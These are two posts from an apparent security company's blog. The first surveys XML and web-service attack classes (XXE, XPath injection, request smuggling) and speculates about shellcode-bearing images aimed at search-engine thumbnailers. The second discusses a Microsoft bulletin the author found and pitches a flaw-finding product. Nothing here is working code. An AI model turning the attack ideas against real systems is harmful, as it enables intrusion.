Posts Tagged dime

The “X” Files

X-Files

It’s been a little while since we last posted so I wanted to get a blog out there so everybody knows we’re still alive! We just finalized the XML schema for our soon to be released BlockWatch product so with all the XML tags, elements, attributes, and such running through my head I figured I’d blog about XML security. I’m sure the majority of penetration testers out there routinely test for the traditional web application vulnerabilities when looking at Web Services. The same old authentication/authorizations weaknesses, faulty encoding/reencoding/redecoding, session management issues, et al. are still all there and it’s not uncommon for a SOAP Web Service to hand off an attack string to some middleware app that forwards it on deep into the internal network for handling by the revered legacy mainframe. Some organizations process so much XML over HTTP that they place XML accelerator devices on their network perimeter. I have a feeling that this trend will increase the amount of private IP web servers that feel the effects of HTTP Request Smuggling.

Additionally, XML parsers that fetch external document references (e.g. remote URI’s embedded in tag attributes) open themselves up to client-side offensives from evil web servers. Crafted file attachments can come in the form of a SOAP DIME element or the traditional multipart HTTP POST file upload. With those things in consideration, Phillippe Lagadec’s ExeFilter talk from CanSecWest 2008 made some pretty good points on why verifying filename extensions and file header contents or magic numbers isn’t always good enough.

The new manifestations of these old problems should be cause for concern but I personally find the newer XML-specific bugs the most exciting. For example: XPath injection, infinitely nesting tags to cause resource exhaustion via a recursive-descent parser, XXE (XML eXternal Entity) attacks, etc.

A single file format for everything is supposed to make things more simple but the lion’s share of real-world implementations over-complicate the fleeting markup language tags to the point where they become a breeding ground for old school exploits and new attack techniques alike–we’re all familiar with the cliche regarding failure of a “system of systems” with too many moving parts. I’ll touch on some more advanced XML attacks later in the post, but first let’s take a step back and remember XML when it still had a fresh beginning.

Towards the end of the twentieth century, when I first started taking notice of all the hype surrounding XML (the eXtensible Markup Language) I held a fairly skeptic attitude towards it as I tend to do with many fledgling technologies/standards. Perhaps I’ve been over-analytical in that respect but look how long it’s taken IPv6 to amass even a minuscule amount of usage! Albeit, a formal data representation grammar certainly was needed in that “dot-bomb” era, a time when mash-up web applications were near impossible to maintain since consistently pattern matching off-site content demanded continuous tweaking of regular expressions, parsers, etc. The so-called browser war of Netscape Navigator vs. Internet Explorer couldn’t have helped things either. If that was a war, then we must be on the brink of browser Armagaeddon now that there’s Chromium, FireFox3, IE8 RTM, Safari4 Beta, Opera, Konqueror, Amaya, w3m, lynx, etc. The good news? We now have Safari for Win32. The bad news? Microsoft no longer supports IE for MacOS..bummer.

I think it’s fairly rational to forecast continued adoption of XML Encryption and WS-* standards for SOAP Web Services that handle business-to-business and other communications protocol vectors. If you’re bored of the same old Tomcat/Xerces, WebLogic/SAX, etc. deployments then prepare for applications written in newer API’s to arrive soon; namely Microsoft WCF and Oslo, the Windows Communication Foundation API and a modeling platform with design tools (respectively.) From the surface of .NET promotional hype it appears as if WCF and Oslo will be synthesized into a suitereminiscent of BizTalk Server’s visual process modeling approach. WCF has commissioned many Web Services standards including WS-Security but of course not all major software vendors are participating in the all of the standards. The crew in Redmond have committed to REST in WCF and it wouldn’t surprise me to see innovative XML communications techniques arising from the combination of Silverlight 3 and .NET RIA Services; for those of you who still don’t know, RIA is an acronym for Rich Internet Applications! Microsoft is leveraging the interoperability of this extensible markup language for the long-proprietary document formats of their Office product suite as part of their Open Specification Promise. Even the Microsoft Interactive Canvas, essentially a table that provides I/O through touch uses a form of XML (XAML) for markup.

Blogosphereans, Security Twits, and other Netizens alike seem to take this Really Simple Syndication thing for granted. Over the past several years or so there’s been a trend of malicious payloads piggybacking on banner ads. Since RSS and Atom are capable of syndicating images as well, I’d like to see a case study detailing the impact of a shellcode-toting image referenced from within an XML-based syndication format. Obvious client-side effects that occur when the end user’s browser renders the image are to be expected (gdiplus.dll, anyone?) What else could be done? Web 2.0 search engines with blog and image search features often pre-process those images into a thumbnail as a part of the indexing process. A little recon might discover the use of libMagick by one and libgd by another. Targeting one specific spiderbot over another could be done by testing the netmask of the source IP address making the TCP connection to the web server or probably even as simple as inspecting the User Agent field in the HTTP request header. Crafting a payload that functions both before and after image resizing or other additional processing (ex. EXIF meta-data removal) would be quite an admirable feat. Notwithstanding, I was quite surprised how much Referer traffic our blog got from images.google.com after Shane included a picture of the great Charlie Brown in his “Good Grief!” post…but I digress.

Several years ago when I was still living in New York, I became fascinated with the subtle intricacies of XML-DSig while studying some WS-Security literature. XML Signature Validation in particular had attracted my attention in earnest. In addition to the characteristics of traditional digital signatures, XML Signatures exhibit additional idiosyncrasies that require a bit of pragmatism in order to be implemented properly and therefore also to be verified properly as well (ex. by a network security analyst.) This is mainly because of the Transform and Reference elements nested within the Signature elements–References and Transforms govern the data to be provided as input to the DigestMethod which produces the cryptic DigestValue string. A Reference element contains a URI attribute which represents the location of the data to be signed. Depending on the type of Transform element, data first dereferenced from the Reference URI is then transformed (i.e. via an XPath query) prior to signature calculation. That’s essentially how it works. Something that may seem awkward is that the XML being signed can remain exactly the same while the digital signature (e.g. the DigestValue element value) has changed. I’ve decided to leave some strange conditions that often come about as an exercise for the reader:

What happens to an XML Digital Signature if … ?

  • No resource exists at the location referenced by the Reference element’s URI attribute value.
  • A circular reference is formed because a URI attribute value points to another Reference element whose URI attribute value is identical to the first.
  • The URI identifies the Signature element itself.
  • A resource exists at the URI, but it’s empty.
  • The Reference element has a URI attribute value which is an empty string, <Reference URI=””>

Leave a Comment

Dimes

2005_dime.jpgMicrosoft Security Bulletin

MS08-010 – Critical CVE-2008-0076

None of the flaws I’ve ever found on Microsoft platforms have ever been public (that is, they have all been derived from internal projects) and it’s nice to see at least in this round of fixes that my bug scored a perfect 10.0 (a dime) on the bulletin. I actually did not test as many platforms and configurations as Microsoft. For those of you that are unaware, bug regression and the overall triage process can become quite intensive. I knew that this vulnerability/flaw/bug/exploit/whatever had wide reaching appeal, fairly easy to see from the fact that all architectures and versions as far back as possible are marked critical.

As with all doings in the security space, walking a line between disclosure and tight-lipped mums, the word practice is not easy. So, what can be said here? Nothing? Something? I guess I have to write something, the marketoid’s wouldn’t be happy if I did not.

Before I digress into any technical discussion, I will take this opportunity to say something about the exploit sales “industry?”. In this world, everything and everybody has their place, that said, any individual that thinks exploits are worth any money, has another thing coming. Look at it this way, if you’re in the business of purchasing information (exploits), by definition you are unaware of the value of that information thereby inherently you are in a position to devalue the time and emotional investment into the derivation of that work. So this means, you’re never going to get back enough cash to make up for your time, EVER!! Where I do see some value in exploit brokers, is exclusively in the capacity of having them take the burden of dealing with uninformed software vendors (the Microsoft/IBM/others process is fairly straight forward).

Now that that’s all done with, I don’t really want to talk about the exploit, at least until some poorly constructed version winds up in metasploit. I will say though that the bulletin is correct in its description and synopsis.

The fact that there are no mitigating factors or workarounds possible, gives me some incentive and reassurance that the tools and methodologies that we’re building into our product offering works.

We’re ramping up development for a big push this quarter and will be uploading some more screenshots and related minutia in the coming months.

Our product in brief is an automated tool for native application flaw finding. It can assess, at runtime in a dynamic way, the integrity of a given binary application. This process then produces test cases and reproductions of what is necessary to trigger the flaw for a developer (this way, reducing regression rates due to bug fixes as it’s much easier to fix something when you can interact with it as opposed to a simple warning message).

We’re working on a management interface (on top of the technical one), that will also enable the lay person to identify architectural problems in arbitrary software also. This is actually quite simple (with the support of our engine), in essence, a landscape or tomography view is laid out before the user, with associated peaks and valleys, this then changes over time (4D), and represents the surface area of your application binary’s response to input. That is, a dynamic environment that is rooted by a system of systems methodology. What becomes apparent is that (if you are in the capacity to fix these issues yourself), as time goes on, and you assign various resources (people) to fix the peaks and turn them into valley’s. The rate at which you push down the peaks (bugs), across the application is not constant, some issues are harder to fix than others and persist. This way, a self-relative understanding of where problem area of code exist poignantly reveal themselves as architectural flaws and appropriate steps can be taken to drive the business case that will support a rewrite.

Whew, that’s a mouthful. Needless to say, we’re working to create the best platform around for software sovereignty.

Comments (1)

%d bloggers like this: